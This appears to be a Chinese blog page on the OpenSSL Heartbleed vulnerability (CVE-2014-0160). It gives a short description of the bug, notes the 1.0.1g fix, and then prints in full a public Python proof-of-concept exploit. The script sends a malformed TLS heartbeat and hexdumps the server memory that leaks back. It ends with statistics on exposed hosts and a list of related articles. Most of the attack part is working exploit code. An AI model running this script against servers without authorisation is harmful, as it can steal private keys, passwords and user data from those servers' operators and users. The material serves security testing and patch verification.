在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

Exploit:

openssl.py

 #!/usr/bin/python

 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

 # The author disclaims copyright to this source code.

 import sys

 import struct

 import socket

 import time

 import select

 import re

 from optparse import OptionParser

 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

 def h2bin(x):

     return x.replace(' ', '').replace('\n', '').decode('hex')

 hello = h2bin('''

 16 03 02 00  dc 01 00 00 d8 03 02 53

 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

 00 0f 00 01 01

 ''')

 hb = h2bin('''

 18 03 02 00 03

 01 40 00

 ''')

 def hexdump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b : b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

         print '  %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def recvall(s, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         r, w, e = select.select([s], [], [], 5)

         if s in r:

             data = s.recv(remain)

             # EOF?

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     return rdata

 def recvmsg(s):

     hdr = recvall(s, 5)

     if hdr is None:

         print 'Unexpected EOF receiving record header - server closed connection'

         return None, None, None

     typ, ver, ln = struct.unpack('>BHH', hdr)

     pay = recvall(s, ln, 10)

     if pay is None:

         print 'Unexpected EOF receiving record payload - server closed connection'

         return None, None, None

     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

     return typ, ver, pay

 def hit_hb(s):

     s.send(hb)

     while True:

         typ, ver, pay = recvmsg(s)

         if typ is None:

             print 'No heartbeat response received, server likely not vulnerable'

             return False

         if typ == 24:

             print 'Received heartbeat response:'

             hexdump(pay)

             if len(pay) > 3:

                 print 'WARNING: server returned more data than it should - server is vulnerable!'

             else:

                 print 'Server processed malformed heartbeat, but did not return any extra data.'

             return True

         if typ == 21:

             print 'Received alert:'

             hexdump(pay)

             print 'Server returned error, likely not vulnerable'

             return False

 def main():

     opts, args = options.parse_args()

     if len(args) < 1:

         options.print_help()

         return

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     print 'Connecting...'

     sys.stdout.flush()

     s.connect((args[0], opts.port))

     print 'Sending Client Hello...'

     sys.stdout.flush()

     s.send(hello)

     print 'Waiting for Server Hello...'

     sys.stdout.flush()

     while True:

         typ, ver, pay = recvmsg(s)

         if typ == None:

             print 'Server closed connection without sending Server Hello.'

             return

         # Look for server hello done message.

         if typ == 22 and ord(pay[0]) == 0x0E:

             break

     print 'Sending heartbeat request...'

     sys.stdout.flush()

     s.send(hb)

     hit_hb(s)

 if __name__ == '__main__':

     main()

来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

http://wooyun.org/bugs/wooyun-2014-055939

OpenSSL "heartbleed" 安全漏洞的更多相关文章

  1. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. 升级OpenSSL修复高危漏洞Heartbleed

    升级OpenSSL修复高危漏洞Heartbleed 背景:          OpenSSL全称为Secure Socket Layer.是Netscape所研发.利用数据加密(Encryption) ...

  5. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  6. OpenSSL Heartbleed原因小结

    User发送心跳报文给Server,Server复制心跳报文的内容回应User. memcpy(bp, p1, payload); Server拷贝心跳报文的内容给Client时,如果拷贝的字节数目超 ...

  7. OpenSSL心脏出血漏洞全回顾

    近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存 ...

  8. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  9. 对OpenSSL心脏出血漏洞的试验

    1.安装OpenSSL环境 sudo apt-get install openssl sudo pip install pyopenssl(中间会提示ffi.h 没有那个文件或目录,sudo apt- ...

随机推荐

  1. JS对象或属性的不变性

    提到不变性,不得不提一个概念: 对象常量定义:结合可写性与可配置性可以创建一个真正的常量属性(不可修改.重定义.删除) 不变性可划分为以下几个等级: 1)禁止扩展:Object.preventExte ...

  2. Nodejs进阶:express+session实现简易身份认证

    本文摘录自<Nodejs学习笔记>,更多章节及更新,请访问 github主页地址.欢迎加群交流,群号 197339705. 文档概览 本文基于express.express-session ...

  3. java中难度大一点的面试题

    1.请大概描述一下Vector和ArrayList的区别,Hashtable和HashMap的区别.(5) (1)Vector和ArrayList的异同 实现原理,功能相同,可以互用 主要区别: Ve ...

  4. 分针网——每日分享: jquery选择器的用法

    jQuery选择器是jQuery库的一大特色,用这些选择器不但可以省去繁琐的JavaScript 书写方式,还可以节省时间和效率,正是有这些jQuery选择器,才让我们更容易的操作JavaScript ...

  5. 【Java SE】如何用Java实现直接选择排序

    摘要:直接选择排序属于选择排序的一种,但是它的排序算法比冒泡排序的速度要快一些,由于它的算法比较简单,所以也比较适合初学者学习掌握. 适宜人群:有一定Java SE基础,明白Java的数据类型,数组的 ...

  6. jenkins 设置自动发送邮件

      1.测试邮件发送 进入jenkins系统管理-->系统设置做如下配置   1.设置系统管理员邮件地址,这是一个全局变量,意味着所有的jenkins执行的任务,最后都会通过这个邮件地址发送邮件 ...

  7. 【Android Widget】1.TextView

    1.创建可被点击的TextView 1.1 在xml中创建可被点击的TextView android:autoLink 是否将符合指定格式的文本转换成可单击的超链接. 属性值可以是如下几个属性值的一个 ...

  8. es6英文文档翻译

    ECMA-262英文文档翻译,github地址: https://github.com/zhoushengmufc/es6 ECMA-262英文文档翻译,在线地址: http://zhoushengf ...

  9. ASP.NET Core 使用 JWT 搭建分布式无状态身份验证系统

    为什么使用 Jwt 最近,移动开发的劲头越来越足,学校搞的各种比赛都需要用手机 APP 来撑场面,所以,作为写后端的,很有必要改进一下以往的基于 Session 的身份认证方式了,理由如下: 移动端经 ...

  10. 用ng-view创建单页APP

    我们假设我们有一个单页面的程序,并且想为这个页面添加动画效果.点击某一个链接会将一个试图滑出,同时将另一个试图滑入. 我们将会使用: 使用 ngRoute 来为我们的页面路由 使用 ngAnimate ...